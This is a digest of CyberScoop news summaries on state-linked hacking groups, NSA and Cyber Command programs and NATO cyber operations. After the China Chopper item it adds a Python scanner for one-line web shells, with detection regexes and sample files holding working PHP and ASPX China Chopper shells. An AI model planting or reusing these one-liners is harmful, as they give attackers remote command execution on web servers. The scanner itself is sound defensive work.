Symantec finds a ‘new’ Chinese hacking group has actually been around for a decade

A Chinese cyber-espionage group that Symantec first exposed last June may actually be part of another group that has already been discovered, according to the company’s researchers. The group, which Symantec labeled “Thrip,” has attacked targets in 12 organizations in Hong Kong, Macau, Indonesia, Malaysia, the Philippines and Vietnam since it was first identified. Additionally, researchers say it has returned with a new custom-built tool. “When they came back in October [or] November, we see [Thrip] using a brand new tool which is built from scratch [that] we’ve never seen before,” Vikram Thakur, a technical director at Symantec, told CyberScoop. “[The hackers] pause, retool, regroup and then they continue their mission.” However, Symantec’s analysis of a backdoor the group has been using, known as Sagerunex, reveals Thrip is likely another threat group — known as Billbug or Lotus Blossom — that has been operating against targets in South Asia […]

The post Symantec finds a ‘new’ Chinese hacking group has actually been around for a decade appeared first on CyberScoop.

Cyber Command’s biggest VirusTotal upload looks to expose North Korean-linked malware

Cyber Command’s largest-ever upload to VirusTotal exposes malware linked with North Korean government hackers, according to security researchers.

“#CNMF has posted multiple new malware samples: https://t.co/fSgk1xpG8t” — USCYBERCOM Malware Alert (@CNMF_VirusAlert), September 8, 2019

Several of the malware samples have been tied to Lazarus Group, a group the U.S. government has linked with the North Korean government. Specifically, the samples look to be what’s known as “HOPLIGHT,” a trojan that has been used to gather information on victims’ operating systems and uses a public SSL certificate for secure communications with attackers. Cyber Command uploaded 11 malware samples in all. FireEye Managing Principal Threat Analyst Andrew Thompson said the upload signals to North Korea’s government that it can’t remain anonymous in cyberspace. “Will this deter intelligence activities? Of course not. That’s foolish. What it does do is articulate [North Koreans] aren’t operating free from attribution, which limits the range of activities they should see as […]

As NSA expands election security task force, Director Paul Nakasone talks lessons learned

A key component of the Pentagon’s effort to defend the 2018 midterm elections from foreign interference was its collaboration with the Department of Justice to disrupt operations from overseas, Gen. Paul Nakasone, director of the National Security Agency, said Thursday. It’s the kind of interagency effort American officials are trying to achieve again before the 2020 presidential election. The NSA and U.S. Cyber Command, a unified combatant command at the Pentagon dedicated to running cyber-operations, worked with the FBI’s Foreign Influence Task Force in 2018 as part of an effort to avoid the kind of Russian meddling that occurred in 2016, Nakasone said. The effort to protect the 2018 midterm elections, collectively known as Synthetic Theology, resulted in disrupting the internet access of Russia’s social media troll farm, the Internet Research Agency. The effort represented the first cyber-operations abroad to protect U.S. elections, and it’s helping inform the intelligence community’s approach to […]

How did a Chinese APT get a U.S. hacking tool before it was leaked? Check Point has a theory.

A Chinese hacking group that has been using tools linked with the National Security Agency might have obtained at least one without breaching NSA systems, according to researchers at cybersecurity company Check Point. The Chinese hacking group APT3, which somehow had in its possession an NSA-linked tool in advance of public leaks in 2016 and 2017, appears to have acquired it by analyzing network traffic on a system that was potentially targeted by the NSA, Check Point says. The theory is that after observing the exploit in the wild, APT3 incorporated it into its own arsenal of attacks with some tweaks, the researchers say. “Check Point learned that the Chinese group was monitoring in-house machines that were compromised by the NSA, capturing the traffic of the attack and was leveraging it to reverse engineer the software vulnerabilities,” the researchers write. Check Point acknowledges that it “can’t prove this beyond any doubt.” The company says it does not know for sure […]

The NSA recognizes it needs to share more nation-state threat data, and faster

The National Security Agency’s new Cybersecurity Directorate wants to more quickly share threat data in response to private sector criticism that the agency has been slow to provide key information that companies need to protect themselves, the head of the new foreign intelligence and digital defense outfit said Wednesday. The NSA’s impetus for creating the Cybersecurity Directorate, set to launch Oct. 1, was to address complaints that context is lacking in the U.S. intelligence community’s threat reports that are issued to private companies. By sharing data such as malicious domain names or IP addresses long after hackers have abandoned them, NSA is not providing the real-time information corporate security teams need to block attacks. Now, the directorate will provide additional context to help sectors like the defense industrial base and election technology providers “prevent and eradicate” intruders, according to Anne Neuberger, director of the NSA’s Cybersecurity Directorate. The goal for the directorate, which was […]

NATO cyber-operations center will be leaning on its members for offensive hacks

The North Atlantic Treaty Organization’s cyber-operations command center in Belgium still has a ways to go before its offensive playbook is set in stone, a NATO cyber official involved in the matter told CyberScoop. The Cyberspace Operations Centre was established almost exactly one year ago, in Mons, Belgium, to help member nations obtain real-time intelligence on and respond to cyberthreats from criminal or nation-state backed hackers. The alliance is still working on pooling member nations’ offensive cyber capabilities for those responses, Group Captain Neal Dewar, deputy director of the Cyberspace Operations Centre, told CyberScoop in an interview. The cyber operations center was created in part to fulfill the alliance’s 2016 decision that under NATO’s Article V, a cyberattack on one member nation may result in a group of members coming to its defense, just as if a physical attack had occurred. But because the alliance does not have its own […]

‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries

Malicious code first discovered nine years ago that has historically been used by groups associated with Chinese state-backed hacks has made a comeback, according to new research from Cisco’s Security and Intelligence Research Group, Talos. The hacking tool is a web shell known as China Chopper. A web shell is a script planted on a web server that lets attackers run commands and access the server remotely through ordinary HTTP requests. This particular web shell has long been known for evading detection. “China Chopper is a slick little web shell that does not get enough exposure and credit for its stealth,” FireEye researchers wrote in 2013 in their blog on the matter. China Chopper’s code has historically been small, according to security researcher Keith Tyler, who wrote on the tool in 2012. That much appears to be the same now — Talos researchers note the most recent campaign has been “extremely simple,” containing just one […]
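The thing that makes China Chopper so small is that its server-side component is a single statement that hands an HTTP request parameter straight to eval(), with the parameter name acting as the operator’s password. As an added example (not code from the article, Talos or FireEye), the following Python scanner looks for exactly that construct in web-root files. The regexes are assumptions drawn from the widely documented PHP and ASPX one-liners, and the file paths and contents are constructed for the example.

```python
"""Heuristic scanner for China Chopper-style one-line web shells.

Added example, not code from the CyberScoop article or from Talos or
FireEye. The server side of China Chopper is a single statement that
feeds a request parameter into eval(); the parameter name doubles as the
operator's password. The regexes are assumptions based on the documented
PHP and ASPX one-liners; the sample web root below is constructed.
"""
import re
from typing import Dict, List, NamedTuple, Optional


class Finding(NamedTuple):
    path: str
    shell_type: str   # "php" or "aspx"
    parameter: str    # request key the operator must send, i.e. the password
    size: int         # bytes; the classic server side is a few dozen bytes


# "param" captures the request key. base64_decode() is permitted between
# eval() and the superglobal because encoded variants are common.
PHP_SHELL = re.compile(
    r"""(?:eval|assert)\s*\(\s*(?:base64_decode\s*\(\s*)?
        \$_(?:POST|GET|REQUEST|COOKIE)\s*\[\s*['"](?P<param>[^'"]+)['"]\s*\]""",
    re.IGNORECASE | re.VERBOSE,
)
# ASP.NET JScript form: eval(Request.Item["pass"], "unsafe")
ASPX_SHELL = re.compile(
    r"""eval\s*\(\s*Request(?:\.Item|\.Form|\.QueryString)?\s*
        \[\s*['"](?P<param>[^'"]+)['"]\s*\]""",
    re.IGNORECASE | re.VERBOSE,
)
SIGNATURES = (("php", PHP_SHELL), ("aspx", ASPX_SHELL))


def classify(path: str, content: str) -> Optional[Finding]:
    """Return a Finding if the file evaluates request-controlled code, else None."""
    for shell_type, pattern in SIGNATURES:
        match = pattern.search(content)
        if match:
            return Finding(path, shell_type, match.group("param"),
                           len(content.encode("utf-8")))
    return None


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Scan a {path: content} mapping and return findings sorted by path."""
    findings = [f for f in (classify(p, c) for p, c in files.items()) if f]
    return sorted(findings, key=lambda f: f.path)


# Constructed sample web root; paths and contents are made up for this example.
SAMPLES = {
    # Classic PHP China Chopper server side.
    "uploads/img.php": "<?php @eval($_POST['pass']); ?>",
    # ASP.NET JScript variant.
    "Default.aspx": '<%@ Page Language="Jscript"%>'
                    '<%eval(Request.Item["pass"],"unsafe");%>',
    # Legitimate form handler: reads $_POST but never evaluates it.
    "contact.php": "<?php echo htmlspecialchars($_POST['name']); ?>",
    # eval() of a constant string: ugly, but not attacker-controlled.
    "legacy/config.php": "<?php eval('return 1+1;'); ?>",
}


if __name__ == "__main__":
    for finding in scan_files(SAMPLES):
        print(f"{finding.path}: {finding.shell_type} shell, "
              f"password parameter {finding.parameter!r}, {finding.size} bytes")
```

To run this against a real web root, read each script file into the mapping passed to scan_files. The recovered parameter name is the useful artifact: it is what the operator must send in every request, so it can be used to confirm a hit in request bodies captured by a WAF or full packet capture. The scanner deliberately only flags eval() or assert() applied to request input, so ordinary form handling and eval() of constants do not trip it; it will miss obfuscated variants that assemble the function name or superglobal at runtime.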

NSA-approved cybersecurity law and policy course now available online

Anyone who is interested in cybersecurity law and policy can now take an online course that was partly shaped by the National Security Agency. The course, which can be accessed through Penn State University’s Clark Center, touches on international and domestic cybersecurity law, cyber risk and technical details like how smartphones function, according to Anne McKenna, a Penn State professor who organized the course. James Houck, director of Penn State’s Center for Security Research and Education, told CyberScoop that the program will serve as a primer to the legal and technical details of offensive and defensive cyber-operations. “What we’re trying to do … is create a framework for people who are trying to be introduced to cyber law, to offensive, defensive cyber operations, and for them to learn the fundamentals, the framework — and in our case legal authorities for how these work,” Houck said. Houck clarified that although the NSA put out […]

How an NSA researcher plans to allow everyone to guard against firmware attacks

A years-long project from researchers at the National Security Agency that could better protect machines from firmware attacks will soon be available to the public, the lead NSA researcher on the project tells CyberScoop. The project will increase security essentially by placing part of a machine’s firmware in a container that isolates it from would-be attackers. A layer of protection is being added to the System Management Interrupt (SMI) handler — code that allows a machine to make adjustments at the hardware level — as part of the open source firmware platform Coreboot. Eugene Myers, who works in the National Security Agency’s Trusted Systems Research Group, told CyberScoop that the end product — known as an SMI Transfer Monitor with protected execution (STM-PE) — will work with x86 processors that run Coreboot. Attackers are increasingly targeting firmware. Just last year, the first-ever documented UEFI rootkit was deployed in the wild, according […]

Army Cyber Command is trying to become an information warfare force

U.S. Army Cyber Command could soon have a new identity. Commander Lt. Gen. Stephen Fogarty said this week he wants his military outfit, dedicated to electronic warfare and information operations, to be renamed the “Army Information Warfare Command.” The rechristening would better represent a new military mission, he said, and comes at a time when Army cyber personnel increasingly deal with troll farms on social media, disrupt ISIS operations, and work to confuse international adversaries’ understanding of where U.S. military units are located. “The intent is to provide a proposal that will change us from Army Cyber Command to Army Information Warfare Command because we believe that is a more accurate descriptor of what I am being asked to do on a daily basis,” Fogarty said at the AFCEA TechNet conference in Augusta, Georgia, this week. But this change, which Fogarty said he intends to push internally at the Department of Defense over the next two months, is more than just a new […]
